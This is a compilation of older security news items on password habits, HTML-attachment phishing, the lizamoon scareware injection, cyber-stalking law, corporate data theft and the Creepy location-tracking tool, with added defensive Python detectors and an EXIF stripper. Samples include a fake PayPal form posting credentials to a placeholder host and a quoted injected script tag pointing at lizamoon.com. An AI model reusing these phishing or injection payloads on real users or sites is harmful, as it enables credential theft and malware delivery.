“This is really not a great idea, particularly for work,” Jones said. “Physical security is just as important as online security.
“Anyone walking by could see the sticky note next to your machine and then break into your accounts (especially if you use the same password for everything),” she added. “The risk is even greater if, as a user, you log into more than one location and have your password written at all those locations.”
Web browsers often ask if they can remember your password for you. Is that safer than writing down your password?
“For some passwords, it may be okay to let the browser remember your password on your personal laptop or home PC,” said Chris Burchett, founder and chief technology officer with Addison, Texas-based information-security firm Credant.
“In general, if the information on the website that requires your password is what you consider to be public, then it may be okay to let the browser remember the password,” Burchett said. “But be careful. Never let the browser remember passwords to banking websites or other sites where private personal identity information is used or available.”
“Also be careful when using a public-kiosk computer like the ones at the airport. Never let browsers on computers you don't own store passwords,” he added. “In fact, it would be best not to log into any website requiring a password from a computer you don't own.”
Password-management software
Instead, the experts suggest using third-party password-management software, which stores all your passwords in one place and protects them with one very strong master password — the only one you’ll have to remember.
“Managing passwords is a challenge because there are so many online accounts requiring passwords these days,” Burchett said. “Using a password manager to securely generate, store, rotate and supply passwords on demand may be worth considering as long as you remember to make the master password strong enough.”
There are dozens of password managers, both free and inexpensive (none cost more than $30). Some of the better-known ones include Web Confidential, LastPass, KeePass and its Mac/Linux sibling KeePassX. Some run on PCs, others on smartphones, while some are browser plug-ins.
As for the password managers that come with browsers, most of them aren’t very secure. Only Opera and Mozilla Firefox use master passwords, and Firefox’s is turned off by default. (Here’s how to turn it on.)
Now that you’ve read all this, do yourself a favor this weekend. Go through all your online accounts and use these tips to create strong, unique passwords for each one, and then use a password manager to remember them all.
It’ll take less time than you think. Next time a friend or relative has an email account hijacked or gets charged for dozens of iTunes songs he didn’t buy, you’ll be glad you did.
[SecurityNewsDaily]
Under the phishing filters' radar
Email recipients opening the HTML document in their browsers are, for example, presented with a bogus PayPal form with the usual request to enter their login details due to alleged security issues. As the form is processed locally on the user's computer, the phishing filter doesn't issue a warning because it only filters external URLs. A click on the "Submit" button then transmits the entered data to a PHP script on a (hacked) server using a POST request. According to M86Security, the browser doesn't warn about this either.
While browsers should at least warn users when sending the data, M86Security stated two potential reasons why they don't: as users don't see the URL they access via POST requests, they can't report it, and consequently the URL is missing from the browser filter's blacklist. The company added that most users can't make sense of the HTML source code that is attached to the email.
Secondly, M86Security said that URLs which lead to a PHP script are very difficult to classify as phishing sites. It is reportedly hard to identify a phishing site without the accompanying HTML code which could, for instance, reveal whether a site pretends to be a banking site. This has apparently caused months-old phishing campaigns to remain undetected. The security firm didn't state whether its assessment only refers to the filter lists maintained for Chrome, Firefox and other browsers, or whether it also includes those of the AV vendors, who maintain separate lists for their own filter products.
[H-Online]
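The detection gap described above, as an added example (not code from M86Security or from any browser vendor): a mail-gateway check that flags an HTML attachment carrying a password form whose action points at a host outside the domain the message claims to come from. The attachment and the target host name below are constructed.

```python
"""Flag HTML e-mail attachments that carry a credential form posting to
an external server. A URL-blacklist filter never sees the form because
it is rendered from the local file; only the POST target is a network
request, and that URL is never shown to the user.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormScanner(HTMLParser):
    """Collect every <form> action and note whether the form carries a
    password field, the signature of a locally rendered phishing page."""

    def __init__(self):
        super().__init__()
        self.forms = []          # one dict per <form>
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "password_field": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, claimed_domains):
    """Return the actions of forms that collect a password and submit it
    somewhere other than a host under one of claimed_domains.

    An empty or relative action is flagged too: a password form inside
    an attachment has no legitimate local destination."""
    scanner = FormScanner()
    scanner.feed(html)
    flagged = []
    for form in scanner.forms:
        if not form["password_field"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        trusted = any(host == d or host.endswith("." + d)
                      for d in claimed_domains)
        if not trusted:
            flagged.append(form["action"])
    return flagged


# Constructed sample: a "PayPal" login form embedded in an HTML attachment
# that posts to a PHP script on an unrelated (placeholder) host.
SAMPLE_ATTACHMENT = """
<html><body>
<h2>PayPal - Security Check</h2>
<p>Your account has been limited. Please confirm your details.</p>
<form method="post" action="http://compromised-host.example/u/login.php">
  Email: <input type="text" name="login_email"><br>
  Password: <input type="password" name="login_password"><br>
  <input type="submit" value="Log In">
</form>
</body></html>
"""

if __name__ == "__main__":
    for action in suspicious_forms(SAMPLE_ATTACHMENT, ["paypal.com"]):
        print("credential form posts off-brand to:", action)
```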
6 Steps to Staying Safe on Social Networks
To get a good sense of why people enjoy online social networking, visit Twitter during the baseball playoffs or during a live broadcast of “American Idol.”
You might be sitting alone on your couch watching the game or the show, but you’re getting the camaraderie of being in a like-minded crowd. You can trash-talk with the person cheering for your opponent, or give a virtual high-five to your “friends.”
The fun part of using online social media is the networking and sharing. However, the dangerous part of using online social media can also be the networking and sharing.

Personal information is exchanged as if the conversation were happening in a private space. But the fact is that you’re really speaking in public.
Depending on the forum and privacy settings, large groups of people you don’t know — possibly even the entire world — might have access to your intimate conversations and off-hand remarks.
Online social media users need to guard private information to stay safe and secure in real life.
Here’s a list of “do’s” and “don’ts” for sharing personal information over social media websites or services.
1. Do take advantage of privacy settings — and encourage your friends to do the same.
A friend of mine had problems with a relative who was following her comments (and making comments of his own) on other friends’ pages, all because her friends — not she — had their sites open to everyone.
2. Don’t announce your vacation plans.
“Vacation photos are a great way to share your family fun with friends, but telling every one of your Facebook friends you’ll be in Bermuda for a week only invites real-life problems. Wait until you’ve returned home to share vacation information online,” said Sarah Carter of Actiance, a Belmont, Calif.-based communications security provider.
Another don’t: Don’t limit this advice to vacations. Practice it any time you plan to be out of the house.
3. Do accept friend requests with caution.
Only accept friend requests from people you know. If you aren’t sure, send a message to ask how you know each other or check them out on Google or Snopes.com to make sure the request isn’t a hoax.
4. Don’t include too much identifying information.
Everybody loves receiving birthday greetings, so go ahead and share the date. But adding the year you were born — along with your full home address, phone numbers and other personal info — gives criminals enough details about you to steal your identity.
5. Do ask questions before clicking a link.
A lot of malware shows up through random links or via status updates on social-media sites. If you aren’t sure about the link, especially if it is a shortened URL, ask the sender if it is legitimate.
6. Don’t automatically trust everyone.
When seeking out victims, criminals often take advantage of the trust levels in social media. They post scams — a popular one is to ask people to send money because the poster is stranded in London. They also disguise themselves as potential friends — “you don’t know me, but we follow the same famous movie star and have lots in common!” — among other devious acts.
[SecurityNewsDaily]
Hundreds of thousands of hacked websites spreading scareware
What is not clear is how often the criminals succeeded in embedding the links so that they actually work.
The scattergun approach taken by the SQL injection attack on the content databases of content management systems has meant that in many cases the links were placed in fields such as the title tag which are not interpreted when the page is displayed and are therefore never called. According to Websense, the URLs were also found in some URLs for iTunes podcasts, possibly via modifications to RSS feeds from the vendors in question. Here too the attack carries no threat, as the browser does not interpret the injected links.
The URLs include an address in the domain lizamoon.com and many security experts have therefore designated it the lizamoon attack. The domains used are no longer accessible. Security specialist Dancho Danchev has published an analysis of the domains used by this particular scareware campaign; he reports that they all ultimately lead back to a single IP address. The domains were registered just a few days ago using automatically registered Google Mail accounts.
Anyone running a web server should check their websites for injected JavaScript tags containing links such as <script src=http://lizamoon.com/ur.php></script>. If found, these should be removed. They will also need to find the SQL injection vulnerability used to inject the nefarious content. Installing the latest version of the web application used may be sufficient, but in some cases it may be advisable to seek professional assistance from a code auditor or pen tester.
[H-Online]
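The check recommended above, as an added example (not code from Websense, H-Online or any CMS vendor): it scans exported content rows for injected script tags with an external source, including fields such as the title that browsers never execute. The rows and the site's own host name are constructed; the only real indicator used is the lizamoon.com URL quoted in the article.

```python
"""Scan exported content-management rows for injected <script src=...>
tags. Removing the tags is only half the fix: the SQL injection hole
that put them there has to be closed as well.
"""
import re
from urllib.parse import urlparse

# Matches a <script> tag whose src is quoted or, as in the injected tag
# quoted in the article, left unquoted.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

KNOWN_BAD_HOSTS = {"lizamoon.com"}      # indicator named in the article


def injected_scripts(rows, own_hosts):
    """Return (row_id, column, src) for every script tag whose source host
    is not one of the site's own hosts.

    rows is an iterable of (row_id, {column: value}); every text column is
    scanned, because the scattergun injection also landed in fields such
    as the title tag that are never interpreted when the page renders."""
    findings = []
    for row_id, fields in rows:
        for column, value in fields.items():
            if not isinstance(value, str):
                continue
            for src in SCRIPT_SRC.findall(value):
                host = (urlparse(src).hostname or "").lower()
                if host and host not in own_hosts:
                    findings.append((row_id, column, src))
    return findings


def known_bad(findings):
    """Subset of findings that point at a host already named as malicious."""
    return [f for f in findings
            if (urlparse(f[2]).hostname or "").lower() in KNOWN_BAD_HOSTS]


# Constructed rows mimicking a CMS posts table after a scattergun SQL
# injection: one hit in a body field, one in a title field, and one
# legitimate script tag pointing at the site's own (placeholder) host.
SAMPLE_ROWS = [
    (1, {"title": "Welcome", "body": "<p>Hello</p>"}),
    (2, {"title": "News",
         "body": "<p>Update</p><script src=http://lizamoon.com/ur.php></script>"}),
    (3, {"title": "Pricing</title><script src=http://lizamoon.com/ur.php></script>",
         "body": "<p>See below</p>"}),
    (4, {"title": "Docs",
         "body": '<script src="https://www.example-site.test/js/app.js"></script>'}),
]

if __name__ == "__main__":
    hits = injected_scripts(SAMPLE_ROWS, {"www.example-site.test"})
    bad = set(known_bad(hits))
    for row_id, column, src in hits:
        label = "KNOWN BAD" if (row_id, column, src) in bad else "review"
        print(f"row {row_id} column {column}: {src} [{label}]")
```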
Move to criminalise cyber-stalking
More than 80 MPs are calling for an overhaul of stalking laws in a move that could see cyber-stalking made an offence.
The MPs, from all parties, also want police to prioritise complaints of stalking and say the crime needs to be defined in law.
Statistics released by probation union Napo, ahead of a seminar at the Houses of Parliament, show that just 2.2% of all incidences of harassment recorded by police ended in a jail sentence.
Napo said that in 2009 there were 53,000 offences of harassment recorded by police, leading to 6,581 convictions. Out of those convicted, 18.5% were jailed, the union said.
The latest figures from the British Crime Survey showed that up to five million people experienced stalking or harassment every year.
A Napo spokesman said: "It is clear therefore that a very small proportion actually reach court and even fewer receive a custodial sentence."
He added: "The sentencing guidelines need to be reviewed as a matter of urgency. Many victims report that complaints are not investigated thoroughly by the police and prosecutors."
Elfyn Llwyd, Plaid Cymru's Parliamentary Leader, is chairing the Justice Unions' Parliamentary Group seminar. Speakers will include Carol Faruqui and Tricia Bernal, who founded Protection Against Stalking after their daughters were killed. The charity's director of operations Laura Richards will also speak at the event to give guidance to MPs whose constituents are being stalked.
The Napo spokesman said stalking is a "life-changing" event in victims' lives, and added: "Stalking is not defined in law, only harassment is. The police have limited powers to enter and search premises of arrested stalkers. Cyber-stalking, which is now common, is not covered by the Protection from Harassment Act 1997."
A leaflet offering advice to MPs on the subject of stalking, both in person and over the internet, will be launched at the event.
[London Evening Standard]
Hackers target business secrets
Many net-savvy thieves are scouring corporate networks for saleable secrets
Intellectual property and business secrets are fast becoming a target for cyber thieves, a study suggests.
Compiled by security firm McAfee, the research found that some hackers are starting to specialise in data stolen from corporate networks.
McAfee said deals were being done for trade secrets, marketing plans, R&D reports and source code.
It urged companies to know who looks after their data as it moves into the cloud or third-party hosting centres.
"Cyber criminals are targeting this information based on what their clients are asking for," said Raj Samani, chief technology officer in Europe for McAfee.
He said some business data had always been scooped up when net thieves compromised PCs using viruses and trojans in a search for logins or credit card details.
The difference now is that there is a ready market for the data they find. In some cases, said Mr Samani, thieves were running campaigns to get at particular companies or certain types of information.
The McAfee report mentioned cases in Germany, Brazil and Italy in which trade secrets were either stolen by an insider or targeted by cyber thieves in a concerted attack.
In some cases, said the McAfee report, companies made the job of the criminals easier because they did little to censor useful information about a corporation's culture or structure revealed in e-mails and other messages.
Such information could prove key for thieves mounting a "social engineering" attack in which they pose as employees to penetrate networks.
The report detailed efforts by firms to watch casual and contract employees and the use of behavioural analysis software to spot anomalous activity on a corporate network.
Perimeter defences
Thefts of intellectual property or key documents could be hard to detect, said Mr Samani.
"You may not even know it's stolen because they just take a copy of it," he said.
Defending against these threats was getting harder, he said, because key workers with access to the most valuable information were out and about using mobile devices far from the defences surrounding a corporate HQ.
"Smartphones and laptops have crossed the perimeter," said Mr Samani.
The report comes in the wake of a series of incidents which reveal how cyber criminals are branching out from their traditional territory of spam and viruses.
2010 saw the arrival of the Stuxnet virus which targeted industrial plant equipment and 2011 has been marked by targeted attacks on petrochemical firms, the London Stock Exchange, the European Commission and many others.
Mr Samani said that, as firms start to use cloud-based services to make data easier to get at, they had to work hard to ensure they know who can see that key corporate information.
Otherwise, he warned, in the event of a breach, companies could find themselves losing the trust of customers or attracting the attention of regulators.
"You can transfer the work but you cannot transfer the liability," said Mr Samani.
[BBC]
Creepy Stalks Twitter, Foursquare, and Flickr Users by Aggregating GPS Data
Let's say you wanted to know where a specific Twitter, Foursquare, or Flickr user spends the majority of her time; Creepy lives up to its name by showing you. Just type in any username for a supported service and it will grab any and all location data it can find, from Foursquare check-ins, tweet locations, and even the EXIF data from photos posted to Flickr, Twitpic, yFrog, and other image services. Essentially, it's a stalker's dream app.
Like the previously mentioned Firesheep extension for Firefox, consider this app more an interesting proof-of-concept (we trust you to use it for good!). Perhaps you didn't realize how accurately your tweets can pinpoint your house or favorite hangouts, or perhaps you didn't even know you were sharing location data in all your uploaded photos (easy to remove if you know how). Punch in your own accounts and see how much shows up—you might be surprised.
Creepy is a free download for Windows and Linux.
[Gizmodo]
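The photo side of the problem above, as an added example (not code from Creepy, Gizmodo or any image service): a checker that tells whether a JPEG carries a GPS block in its Exif metadata, and a stripper that removes the Exif segment before upload. It parses the JPEG marker segments itself, so it needs no image library; the sample file is constructed inline with a minimal Exif block and no real image data.

```python
"""Detect and strip GPS location metadata from a JPEG.

Exif lives in an APP1 segment; the GPS data is a sub-IFD reached through
tag 0x8825 in IFD0. Dropping the whole APP1 segment removes it (and the
camera model, timestamps and so on) while leaving the picture intact.
"""
import struct

EXIF_HEADER = b"Exif\x00\x00"
GPS_IFD_POINTER = 0x8825          # Exif tag that points at the GPS sub-IFD


def _segments(data):
    """Return (marker, start, end) for each marker segment before SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    segs, pos = [], 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xDA:                      # SOS: scan data follows
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segs.append((marker, pos, pos + 2 + length))
        pos += 2 + length
    return segs


def _is_exif(data, marker, start):
    return marker == 0xE1 and data[start + 4:start + 10] == EXIF_HEADER


def has_gps(data):
    """True if IFD0 of the Exif block carries a GPS sub-IFD pointer."""
    for marker, start, end in _segments(data):
        if not _is_exif(data, marker, start):
            continue
        tiff = data[start + 10:end]
        e = ">" if tiff[:2] == b"MM" else "<"      # TIFF byte order
        ifd0 = struct.unpack(e + "I", tiff[4:8])[0]
        count = struct.unpack(e + "H", tiff[ifd0:ifd0 + 2])[0]
        for i in range(count):
            off = ifd0 + 2 + 12 * i                  # 12-byte IFD entries
            if struct.unpack(e + "H", tiff[off:off + 2])[0] == GPS_IFD_POINTER:
                return True
    return False


def strip_exif(data):
    """Return the JPEG with every Exif APP1 segment removed, image data kept."""
    segs = _segments(data)
    out = bytearray(data[:2])
    for marker, start, end in segs:
        if not _is_exif(data, marker, start):
            out += data[start:end]
    out += data[segs[-1][2] if segs else 2:]     # SOS onward, untouched
    return bytes(out)


def sample_jpeg(with_gps):
    """Constructed minimal JPEG: one Exif APP1, then a stub SOS and EOI."""
    entries = [(0x0110, 2, 4, b"Cam\x00")]               # Model, ASCII
    if with_gps:
        entries.append((GPS_IFD_POINTER, 4, 1, struct.pack(">I", 38)))
    ifd0 = struct.pack(">H", len(entries))
    for tag, typ, cnt, val in entries:
        ifd0 += struct.pack(">HHI", tag, typ, cnt) + val.ljust(4, b"\x00")
    ifd0 += b"\x00\x00\x00\x00"                           # no IFD1
    tiff = b"MM\x00\x2a\x00\x00\x00\x08" + ifd0            # IFD0 at offset 8
    if with_gps:   # GPS IFD at offset 38: a single GPSLatitudeRef entry
        tiff += struct.pack(">HHHI", 1, 1, 2, 2) + b"N\x00\x00\x00" + b"\x00" * 4
    payload = EXIF_HEADER + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload
    sos = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34"
    return b"\xff\xd8" + app1 + sos + b"\xff\xd9"


if __name__ == "__main__":
    tagged = sample_jpeg(with_gps=True)
    print("sample has GPS:", has_gps(tagged))
    print("after strip:", has_gps(strip_exif(tagged)))
```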